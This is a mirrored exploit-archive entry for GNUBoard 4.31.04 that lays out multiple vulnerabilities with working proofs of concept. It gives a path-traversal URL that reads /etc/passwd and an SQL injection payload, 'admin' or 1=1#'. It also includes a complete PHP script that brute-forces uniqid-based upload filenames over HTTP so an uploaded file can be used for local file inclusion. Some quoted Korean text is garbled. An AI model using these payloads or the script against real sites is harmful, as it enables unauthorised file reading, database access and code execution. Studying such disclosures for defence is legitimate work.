bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/7927.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

230 lines
5.9 KiB
Text
Executable file
Raw Blame History

GNUBoard V4.31.04 (09.01.30) Multiple Local/Remote Vulnerability
bY make0day@gmail.com
/*************************
SIR GNUBoard (VERSION 4.31.04 (09.01.30))is a widely used bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But we find a file include vulnerability affects SIR GNUBoard.
In special conditions,it may be used as a remote file include vulnerability .
This issue to execute arbitrary PHP code on an affected computer with the privileges of the affected Web server.
Here is the details:
**************************/
TEST ON VERSION 4.31.04 (08.01.30)
/***************************
Local File Inclusion Vulnerability
/poll_result.php
include_once("./_common.php");
$po = sql_fetch(" select * from $g4[poll_table] where po_id = '$po_id' ");
if (!$po[po_id])
¡Š¡Š
echo "<script language='javascript' src='$g4[path]/js/sideview.js'></script>";
if (!$skin_dir) $skin_dir = "basic";
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
include_once ("$poll_skin_path/poll_result.skin.php"); //file include
*************************/
poc:
http://test.com/GnuBoard/bbs/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00
/***************************
SQL Injection Vulnerability
/register_form.skin.php
<?
if (!defined("_GNUBOARD_")) exit;
?>
<style type="text/css">
<!--
¡Š¡Š
function fregisterform_submit(f)
{
if (f.w.value == "") {
reg_mb_id_check();
if ($F('mb_id_enabled')!='000') {
alert('Èž¿øŸÆÀ̵𞊠ÀÔ·ÂÇÏÁö ŸÊŸÒ°Å³ª ÀԷ¿¡ ¿À·ù°¡ ÀÖœÀŽÏŽÙ.');
$('reg_mb_id').activate();
return false;
}
}
//WTF javascript~!!, We can inject sql query at mb_id, It wasn`t addslushed
/point.php
<?
include_once("./_common.php");
¡Š¡Š
$sql_common = " from $g4[point_table] where mb_id = '$member[mb_id]' "; //mb_id
¡Š¡Š
$sql = " select *
$sql_common
$sql_order
limit $from_record, $rows ";
*************************/
poc:
mb_id = admin' or 1=1#
/***************************
File name disclosure Vulnerability
/register_form_update.php
<?
$g4[title] = $wr_subject . "±ÛÀÔ·Â";
include_once("./_common.php");
@include_once("$board_skin_path/write_update.head.skin.php");
¡Š¡Š
$filename = preg_replace("/\.(php|phtm|htm|cgi|pl|exe|jsp|asp|inc)/i", "$0-x", $filename);
$upload[$i][file] = abs(ip2long($_SERVER[REMOTE_ADDR])).'_'.substr(md5(uniqid($g4[server_time])),0,8).'_'.str_replace('%', '', urlencode($filename));
//Key point
$dest_file = "$g4[path]/data/file/$bo_table/" . $upload[$i][file];
1) uniqid is just unix time stamp + usec(micro time),
2) yeah, We can brute force usec in 0 ~ 0x100000 range
3) Also, We can upload two files when write a post,
4) By uploading image file, we can get encoded file name ex) http://test.com/GnuBoard/data/file/happy/747682804_462b38f4_1.jpg
5) By uploading txt file, we can get exact time (y/m/d/h/m/s) ex) DATE : 2009-01-30 08:35:49
-> As a result, We can use arbitrary file for Local file inclusion
*************************/
poc:
/MicrosecBrute.php
<html>
<head>
<title>test</title>
</head>
<body>
<xmp>
<?
////////////////////////////////////////////////////////////////////////////////
//http://test.com/GnuBoard/data/file/happy/747682804_462b38f4_1.jpg
$t_host = "test.com"; //target host
$t_dir = "/GnuBoard/data/file/happy/"; //upload directory
$encodedimgname = "747682804_462b38f4_1.jpg"; //Encoded Image file name
$imgname = "1.jpg"; //Upload img file name
$fname = "test.txt"; //Upload wanted file name
$year = "2009"; //file upload time 2009-01-30 08:35:49
$mon = "01";
$day = "30";
$hour = "08";
$min = "35";
$sec = "49";
$ip = $_SERVER[REMOTE_ADDR]; //Attacker IP
/////////////////////////////////////////////////////////////////////////////////
$longip = abs(ip2long($ip));
$encfname = urlencode($fname);
$encimgname = urlencode($imgname);
$time = mktime ($hour, $min, $sec, $mon, $day, $year);
$prefix = $time;
$_date = date ("Y m j g i a s", $time);
echo "IP : $ip\n";
echo "Wanted File : $encfname\n";
echo "Img File : $encimgname\n";
echo "time : $_date\n";
echo "dir : ".$t_host.$t_dir."\n";
ob_flush();
flush();
?>
<?
for($i = 0; $i < 0x100000; $i++) //Find img upload time
{
$uniq_id = sprintf("%s%08x%05x",$prefix,$time,$i);
$fullname = $longip.'_'.substr(md5($uniq_id),0,8).'_'.$encimgname;
if(stristr($fullname,$encodedimgname))
{
$img_time = $i;
break;
}
}
echo "Image file upload usec : $img_time\n";
ob_flush();
flush();
?>
<?
for($i = $img_time; $i < 0x100000; $i++) //Find wanted upload time
{
$uniq_id = sprintf("%s%08x%05x",$prefix,$time,$i);
$fullname = $longip.'_'.substr(md5($uniq_id),0,8).'_'.$encfname;
$ret = myGet($t_host, $t_dir.$fullname);
if(stristr($ret,"200 OK"))
{
echo "200 OK :) URL : http://".$t_host.$t_dir.$fullname."\n";
exit();
}
}
echo "404 Not Found :(\n";
function myGet($host, $target, $port = 80)
{
$request = "HEAD $target HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0\r\n";
$request .= "Accept: text/html\r\n";
$request .= "Connection: close\r\n";
$request .= "\r\n";
$socket = fsockopen($host, $port, $errno, $errstr, 100);
fputs($socket, $request);
$ret = "";
while(!feof($socket))
$ret .= fgets( $socket, 4096 );
fclose( $socket );
return $ret;
}
?>
</xmp>
</body>
</html>
*************************/
Result : http://test.com/GnuBoard/data/file/happy/747682804_d57d84be_test.txt
# milw0rm.com [2009-01-30]
Reference in a new issue View git blame Copy permalink